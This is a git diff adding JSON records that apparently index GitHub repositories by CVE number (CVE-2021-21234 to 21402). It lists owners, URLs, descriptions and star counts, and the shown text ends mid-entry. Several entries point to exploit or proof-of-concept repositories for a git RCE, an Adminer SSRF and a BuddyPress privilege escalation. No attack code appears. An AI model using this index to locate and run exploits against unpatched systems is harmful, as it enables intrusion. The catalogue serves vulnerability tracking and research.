0, + "subscribers_count": 3 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-21234.json b/2021/CVE-2021-21234.json new file mode 100644 index 0000000000..f4f949e8cf --- /dev/null +++ b/2021/CVE-2021-21234.json @@ -0,0 +1,64 @@ +[ + { + "id": 375059494, + "name": "CVE-2021-21234", + "full_name": "PwCNO-CTO\/CVE-2021-21234", + "owner": { + "login": "PwCNO-CTO", + "id": 58770486, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/58770486?v=4", + "html_url": "https:\/\/github.com\/PwCNO-CTO", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/PwCNO-CTO\/CVE-2021-21234", + "description": "Directory traversal vulnerability in the spring-boot-actuator-logview library", + "fork": false, + "created_at": "2021-06-08T15:31:54Z", + "updated_at": "2022-03-16T01:54:31Z", + "pushed_at": "2021-06-08T15:32:07Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 418722822, + "name": "CVE-2021-21234", + "full_name": "xiaojiangxl\/CVE-2021-21234", + "owner": { + "login": "xiaojiangxl", + "id": 58814935, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/58814935?v=4", + "html_url": "https:\/\/github.com\/xiaojiangxl", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/xiaojiangxl\/CVE-2021-21234", + "description": null, + "fork": false, + "created_at": "2021-10-19T01:08:48Z", + "updated_at": "2023-08-24T05:14:06Z", + "pushed_at": "2021-10-19T01:18:49Z", + "stargazers_count": 6, + "watchers_count": 6, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 6, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-21239.json b/2021/CVE-2021-21239.json new file mode 100644 index 0000000000..912d04d140 --- /dev/null +++ b/2021/CVE-2021-21239.json @@ -0,0 +1,33 @@ +[ + { + "id": 830747658, + "name": "CVE-2021-21239-Exploit", + "full_name": "RyanBoomer30\/CVE-2021-21239-Exploit", + "owner": { + "login": "RyanBoomer30", + "id": 73788695, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/73788695?v=4", + "html_url": "https:\/\/github.com\/RyanBoomer30", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/RyanBoomer30\/CVE-2021-21239-Exploit", + "description": "Report documentation of this script is below", + "fork": false, + "created_at": "2024-07-18T23:02:10Z", + "updated_at": "2024-07-18T23:15:39Z", + "pushed_at": "2024-07-18T23:15:36Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-21300.json b/2021/CVE-2021-21300.json new file mode 100644 index 0000000000..2fdc399b8b --- /dev/null +++ b/2021/CVE-2021-21300.json @@ -0,0 +1,436 @@ +[ + { + "id": 346285133, + "name": "CVE-2021-21300", + "full_name": "AlkenePan\/CVE-2021-21300", + "owner": { + "login": "AlkenePan", + "id": 8273781, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/8273781?v=4", + "html_url": "https:\/\/github.com\/AlkenePan", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/AlkenePan\/CVE-2021-21300", + "description": null, + "fork": false, + "created_at": "2021-03-10T08:29:49Z", + "updated_at": "2023-11-18T03:10:56Z", + "pushed_at": "2021-03-10T08:30:25Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 5, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 5, + "watchers": 0, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 346425578, + "name": "CVE-2021-21300", + "full_name": "Faisal78123\/CVE-2021-21300", + "owner": { + "login": "Faisal78123", + "id": 2056026, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/2056026?v=4", + "html_url": "https:\/\/github.com\/Faisal78123", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Faisal78123\/CVE-2021-21300", + "description": null, + "fork": false, + "created_at": "2021-03-10T16:45:46Z", + "updated_at": "2021-03-18T10:37:28Z", + "pushed_at": "2021-03-18T10:37:26Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 346434188, + "name": "CVE-2021-21300", + "full_name": "erranfenech\/CVE-2021-21300", + "owner": { + "login": "erranfenech", + "id": 52293769, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/52293769?v=4", + "html_url": "https:\/\/github.com\/erranfenech", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/erranfenech\/CVE-2021-21300", + "description": null, + "fork": false, + "created_at": "2021-03-10T17:15:49Z", + "updated_at": "2021-03-10T17:26:03Z", + "pushed_at": "2021-03-10T17:26:00Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 346559767, + "name": "CVE-2021-21300", + "full_name": "Maskhe\/CVE-2021-21300", + "owner": { + "login": "Maskhe", + "id": 30264078, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/30264078?v=4", + "html_url": "https:\/\/github.com\/Maskhe", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Maskhe\/CVE-2021-21300", + "description": null, + "fork": false, + "created_at": "2021-03-11T02:57:11Z", + "updated_at": "2023-09-28T11:25:41Z", + "pushed_at": "2021-03-11T03:16:37Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 3, + "watchers": 1, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 346572089, + "name": "CVE-2021-21300", + "full_name": "1uanWu\/CVE-2021-21300", + "owner": { + "login": "1uanWu", + "id": 23513206, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/23513206?v=4", + "html_url": "https:\/\/github.com\/1uanWu", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/1uanWu\/CVE-2021-21300", + "description": "remote code exec for git", + "fork": false, + "created_at": "2021-03-11T03:59:49Z", + "updated_at": "2021-03-16T02:36:13Z", + "pushed_at": "2021-03-11T04:14:25Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 346654892, + "name": "CVE-2021-21300", + "full_name": "Kirill89\/CVE-2021-21300", + "owner": { + "login": "Kirill89", + "id": 2003936, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/2003936?v=4", + "html_url": "https:\/\/github.com\/Kirill89", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Kirill89\/CVE-2021-21300", + "description": null, + "fork": false, + "created_at": "2021-03-11T09:56:03Z", + "updated_at": "2021-03-11T10:01:59Z", + "pushed_at": "2021-03-11T10:01:57Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 347847778, + "name": "cve-2021-21300", + "full_name": "ETOCheney\/cve-2021-21300", + "owner": { + "login": "ETOCheney", + "id": 28469578, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/28469578?v=4", + "html_url": "https:\/\/github.com\/ETOCheney", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ETOCheney\/cve-2021-21300", + "description": null, + "fork": false, + "created_at": "2021-03-15T05:28:47Z", + "updated_at": "2021-03-15T05:30:16Z", + "pushed_at": "2021-03-15T05:30:14Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 355023650, + "name": "CVE-2021-21300", + "full_name": "fengzhouc\/CVE-2021-21300", + "owner": { + "login": "fengzhouc", + "id": 22309037, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/22309037?v=4", + "html_url": "https:\/\/github.com\/fengzhouc", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/fengzhouc\/CVE-2021-21300", + "description": null, + "fork": false, + "created_at": "2021-04-06T01:44:17Z", + "updated_at": "2021-04-06T02:14:31Z", + "pushed_at": "2021-04-06T02:14:29Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 355441102, + "name": "CVE-2021-21300", + "full_name": "danshuizhangyu\/CVE-2021-21300", + "owner": { + "login": "danshuizhangyu", + "id": 82081080, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/82081080?v=4", + "html_url": "https:\/\/github.com\/danshuizhangyu", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/danshuizhangyu\/CVE-2021-21300", + "description": null, + "fork": false, + "created_at": "2021-04-07T06:48:16Z", + "updated_at": "2021-04-08T01:46:54Z", + "pushed_at": "2021-04-08T01:46:52Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 407074218, + "name": "CVE-2021-21300", + "full_name": "0ahu\/CVE-2021-21300", + "owner": { + "login": "0ahu", + "id": 9623677, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/9623677?v=4", + "html_url": "https:\/\/github.com\/0ahu", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/0ahu\/CVE-2021-21300", + "description": null, + "fork": false, + "created_at": "2021-09-16T07:53:40Z", + "updated_at": "2021-09-16T07:53:40Z", + "pushed_at": "2021-09-16T07:53:41Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 509747722, + "name": "CVE-2021-21300", + "full_name": "macilin\/CVE-2021-21300", + "owner": { + "login": "macilin", + "id": 10361930, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/10361930?v=4", + "html_url": "https:\/\/github.com\/macilin", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/macilin\/CVE-2021-21300", + "description": null, + "fork": false, + "created_at": "2022-07-02T12:19:21Z", + "updated_at": "2022-07-02T12:19:21Z", + "pushed_at": "2022-07-02T12:19:22Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 524400659, + "name": "CVE-2021-21300", + "full_name": "Roboterh\/CVE-2021-21300", + "owner": { + "login": "Roboterh", + "id": 86140745, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/86140745?v=4", + "html_url": "https:\/\/github.com\/Roboterh", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Roboterh\/CVE-2021-21300", + "description": "the payload of CVE-2021-21300", + "fork": false, + "created_at": "2022-08-13T13:00:58Z", + "updated_at": "2022-08-13T13:22:15Z", + "pushed_at": "2022-08-13T13:22:12Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 636136004, + "name": "Network_Security_NYCU", + "full_name": "henry861010\/Network_Security_NYCU", + "owner": { + "login": "henry861010", + "id": 98812000, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/98812000?v=4", + "html_url": "https:\/\/github.com\/henry861010", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/henry861010\/Network_Security_NYCU", + "description": "CVE-2021-21300", + "fork": false, + "created_at": "2023-05-04T07:46:35Z", + "updated_at": "2023-05-18T02:39:14Z", + "pushed_at": "2023-05-18T02:41:07Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 711134863, + "name": "CVE-2021-21300", + "full_name": "Saboor-Hakimi-23\/CVE-2021-21300", + "owner": { + "login": "Saboor-Hakimi-23", + "id": 122254602, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/122254602?v=4", + "html_url": "https:\/\/github.com\/Saboor-Hakimi-23", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Saboor-Hakimi-23\/CVE-2021-21300", + "description": null, + "fork": false, + "created_at": "2023-10-28T10:17:45Z", + "updated_at": "2023-10-28T10:20:20Z", + "pushed_at": "2023-10-28T10:30:31Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-21311.json b/2021/CVE-2021-21311.json new file mode 100644 index 0000000000..bd75e4341b --- /dev/null +++ b/2021/CVE-2021-21311.json @@ -0,0 +1,64 @@ +[ + { + "id": 459287435, + "name": "CVE-2021-21311", + "full_name": "llhala\/CVE-2021-21311", + "owner": { + "login": "llhala", + "id": 79380572, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/79380572?v=4", + "html_url": "https:\/\/github.com\/llhala", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/llhala\/CVE-2021-21311", + "description": "Adminer is an open-source database management in a single PHP file. In adminer from version 4.0.0 and before 4.7.9 there is a server-side request forgery vulnerability. Users of Adminer versions bundling all drivers (e.g. `adminer.php`) are affected. This is fixed in version 4.7.9.", + "fork": false, + "created_at": "2022-02-14T18:54:53Z", + "updated_at": "2024-10-22T20:45:19Z", + "pushed_at": "2022-02-14T19:01:29Z", + "stargazers_count": 6, + "watchers_count": 6, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 6, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 652635516, + "name": "CVE-2021-21311", + "full_name": "omoknooni\/CVE-2021-21311", + "owner": { + "login": "omoknooni", + "id": 76114650, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/76114650?v=4", + "html_url": "https:\/\/github.com\/omoknooni", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/omoknooni\/CVE-2021-21311", + "description": null, + "fork": false, + "created_at": "2023-06-12T13:32:52Z", + "updated_at": "2024-11-22T11:42:56Z", + "pushed_at": "2023-07-17T09:09:10Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-21315.json b/2021/CVE-2021-21315.json new file mode 100644 index 0000000000..375e095abc --- /dev/null +++ b/2021/CVE-2021-21315.json @@ -0,0 +1,201 @@ +[ + { + "id": 343523383, + "name": "CVE-2021-21315-PoC", + "full_name": "ForbiddenProgrammer\/CVE-2021-21315-PoC", + "owner": { + "login": "ForbiddenProgrammer", + "id": 72838191, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/72838191?v=4", + "html_url": "https:\/\/github.com\/ForbiddenProgrammer", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ForbiddenProgrammer\/CVE-2021-21315-PoC", + "description": "CVE 2021-21315 PoC", + "fork": false, + "created_at": "2021-03-01T18:52:41Z", + "updated_at": "2024-09-03T18:20:47Z", + "pushed_at": "2021-06-09T13:27:20Z", + "stargazers_count": 154, + "watchers_count": 154, + "has_discussions": false, + "forks_count": 25, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve", + "cybersecurity", + "infosec", + "injection", + "nodejs", + "offensive-security", + "pentesting", + "proof-of-concept", + "redteaming", + "research", + "vulnerabilities", + "vulnerability" + ], + "visibility": "public", + "forks": 25, + "watchers": 154, + "score": 0, + "subscribers_count": 9 + }, + { + "id": 344455733, + "name": "CVE-2021-21315v2", + "full_name": "cherrera0001\/CVE-2021-21315v2", + "owner": { + "login": "cherrera0001", + "id": 19656010, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/19656010?v=4", + "html_url": "https:\/\/github.com\/cherrera0001", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/cherrera0001\/CVE-2021-21315v2", + "description": null, + "fork": false, + "created_at": "2021-03-04T11:47:18Z", + "updated_at": "2021-03-13T02:06:37Z", + "pushed_at": "2021-03-04T11:47:48Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 3 + }, + { + "id": 387065961, + "name": "CVE-2021-21315-exploit", + "full_name": "MazX0p\/CVE-2021-21315-exploit", + "owner": { + "login": "MazX0p", + "id": 54814433, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/54814433?v=4", + "html_url": "https:\/\/github.com\/MazX0p", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/MazX0p\/CVE-2021-21315-exploit", + "description": "systeminformation", + "fork": false, + "created_at": "2021-07-18T01:18:31Z", + "updated_at": "2021-07-18T16:23:04Z", + "pushed_at": "2021-07-18T16:23:02Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 0 + }, + { + "id": 404010458, + "name": "CVE-2021-21315", + "full_name": "alikarimi999\/CVE-2021-21315", + "owner": { + "login": "alikarimi999", + "id": 90207127, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/90207127?v=4", + "html_url": "https:\/\/github.com\/alikarimi999", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/alikarimi999\/CVE-2021-21315", + "description": null, + "fork": false, + "created_at": "2021-09-07T14:31:20Z", + "updated_at": "2024-08-12T20:16:14Z", + "pushed_at": "2021-09-20T12:43:05Z", + "stargazers_count": 4, + "watchers_count": 4, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 4, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 426512152, + "name": "CVE-2021-21315", + "full_name": "G01d3nW01f\/CVE-2021-21315", + "owner": { + "login": "G01d3nW01f", + "id": 75846902, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/75846902?v=4", + "html_url": "https:\/\/github.com\/G01d3nW01f", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/G01d3nW01f\/CVE-2021-21315", + "description": "rust noob tried write easy exploit code with rust lang", + "fork": false, + "created_at": "2021-11-10T06:40:17Z", + "updated_at": "2021-12-27T01:30:24Z", + "pushed_at": "2021-12-27T01:30:21Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 427956887, + "name": "CVE-2021-21315-POC", + "full_name": "xMohamed0\/CVE-2021-21315-POC", + "owner": { + "login": "xMohamed0", + "id": 94008154, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/94008154?v=4", + "html_url": "https:\/\/github.com\/xMohamed0", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/xMohamed0\/CVE-2021-21315-POC", + "description": null, + "fork": false, + "created_at": "2021-11-14T14:52:25Z", + "updated_at": "2021-11-14T14:53:06Z", + "pushed_at": "2021-11-14T14:53:04Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-21341.json b/2021/CVE-2021-21341.json new file mode 100644 index 0000000000..f6fdaf6e3c --- /dev/null +++ b/2021/CVE-2021-21341.json @@ -0,0 +1,64 @@ +[ + { + "id": 365686424, + "name": "CVE-2021-21341", + "full_name": "s-index\/CVE-2021-21341", + "owner": { + "login": "s-index", + "id": 56715563, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/56715563?v=4", + "html_url": "https:\/\/github.com\/s-index", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/s-index\/CVE-2021-21341", + "description": "XStream DoS CVE-2021-21341", + "fork": false, + "created_at": "2021-05-09T06:46:38Z", + "updated_at": "2021-05-09T06:48:28Z", + "pushed_at": "2021-05-09T06:48:26Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 470049863, + "name": "ka-cve-2021-21341", + "full_name": "Mani1325\/ka-cve-2021-21341", + "owner": { + "login": "Mani1325", + "id": 96471113, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/96471113?v=4", + "html_url": "https:\/\/github.com\/Mani1325", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Mani1325\/ka-cve-2021-21341", + "description": null, + "fork": false, + "created_at": "2022-03-15T07:28:52Z", + "updated_at": "2022-03-15T07:38:51Z", + "pushed_at": "2022-03-15T07:38:48Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-21349.json b/2021/CVE-2021-21349.json new file mode 100644 index 0000000000..74289e42a9 --- /dev/null +++ b/2021/CVE-2021-21349.json @@ -0,0 +1,33 @@ +[ + { + "id": 365687047, + "name": "CVE-2021-21349", + "full_name": "s-index\/CVE-2021-21349", + "owner": { + "login": "s-index", + "id": 56715563, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/56715563?v=4", + "html_url": "https:\/\/github.com\/s-index", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/s-index\/CVE-2021-21349", + "description": "XStream SSRF CVE-2021-21349", + "fork": false, + "created_at": "2021-05-09T06:50:31Z", + "updated_at": "2021-06-09T15:09:36Z", + "pushed_at": "2021-05-09T06:54:09Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-21380.json b/2021/CVE-2021-21380.json new file mode 100644 index 0000000000..b2ec4e8ba9 --- /dev/null +++ b/2021/CVE-2021-21380.json @@ -0,0 +1,33 @@ +[ + { + "id": 574737413, + "name": "codeql-workshop-cve-2021-21380", + "full_name": "rvermeulen\/codeql-workshop-cve-2021-21380", + "owner": { + "login": "rvermeulen", + "id": 636626, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/636626?v=4", + "html_url": "https:\/\/github.com\/rvermeulen", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/rvermeulen\/codeql-workshop-cve-2021-21380", + "description": "A CodeQL workshop covering CVE-2021-21380", + "fork": false, + "created_at": "2022-12-06T00:53:08Z", + "updated_at": "2024-11-26T14:23:34Z", + "pushed_at": "2024-11-26T14:23:29Z", + "stargazers_count": 12, + "watchers_count": 12, + "has_discussions": false, + "forks_count": 5, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 5, + "watchers": 12, + "score": 0, + "subscribers_count": 0 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-21389.json b/2021/CVE-2021-21389.json new file mode 100644 index 0000000000..b8e6468a70 --- /dev/null +++ b/2021/CVE-2021-21389.json @@ -0,0 +1,33 @@ +[ + { + "id": 372529238, + "name": "CVE-2021-21389", + "full_name": "HoangKien1020\/CVE-2021-21389", + "owner": { + "login": "HoangKien1020", + "id": 24661746, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/24661746?v=4", + "html_url": "https:\/\/github.com\/HoangKien1020", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/HoangKien1020\/CVE-2021-21389", + "description": "BuddyPress is an open source WordPress plugin to build a community site. In releases of BuddyPress from 5.0.0 before 7.2.1 it's possible for a non-privileged, regular user to obtain administrator rights by exploiting an issue in the REST API members endpoint. The vulnerability has been fixed in BuddyPress 7.2.1. Existing installations of the plugin should be updated to this version to mitigate the issue.", + "fork": false, + "created_at": "2021-05-31T14:12:26Z", + "updated_at": "2024-08-12T20:13:29Z", + "pushed_at": "2021-05-31T14:16:20Z", + "stargazers_count": 17, + "watchers_count": 17, + "has_discussions": false, + "forks_count": 7, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 7, + "watchers": 17, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-21401.json b/2021/CVE-2021-21401.json new file mode 100644 index 0000000000..00181a5a6b --- /dev/null +++ b/2021/CVE-2021-21401.json @@ -0,0 +1,64 @@ +[ + { + "id": 883918850, + "name": "CVE-2021-21401_nanopb-c_AOSP10_R33", + "full_name": "uthrasri\/CVE-2021-21401_nanopb-c_AOSP10_R33", + "owner": { + "login": "uthrasri", + "id": 145666390, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/145666390?v=4", + "html_url": "https:\/\/github.com\/uthrasri", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/uthrasri\/CVE-2021-21401_nanopb-c_AOSP10_R33", + "description": null, + "fork": false, + "created_at": "2024-11-05T20:05:20Z", + "updated_at": "2024-11-08T10:21:10Z", + "pushed_at": "2024-11-06T11:51:14Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 887731723, + "name": "external_nanopb-c_AOSP10_CVE-2021-21401", + "full_name": "HimanshuS67\/external_nanopb-c_AOSP10_CVE-2021-21401", + "owner": { + "login": "HimanshuS67", + "id": 188300861, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/188300861?v=4", + "html_url": "https:\/\/github.com\/HimanshuS67", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/HimanshuS67\/external_nanopb-c_AOSP10_CVE-2021-21401", + "description": null, + "fork": false, + "created_at": "2024-11-13T07:27:01Z", + "updated_at": "2024-11-13T07:28:20Z", + "pushed_at": "2024-11-13T07:28:20Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-21402.json b/2021/CVE-2021-21402.json new file mode 100644 index 0000000000..5283d89062 --- /dev/null +++ b/2021/CVE-2021-21402.json @@ -0,0 +1,95 @@ +[ + { + "id": 356203698, + "name": "CVE-2021-21402-Jellyfin", + "full_name": "jiaocoll\/CVE-2021-21402-Jellyfin", + "owner": { + "login": "jiaocoll", + 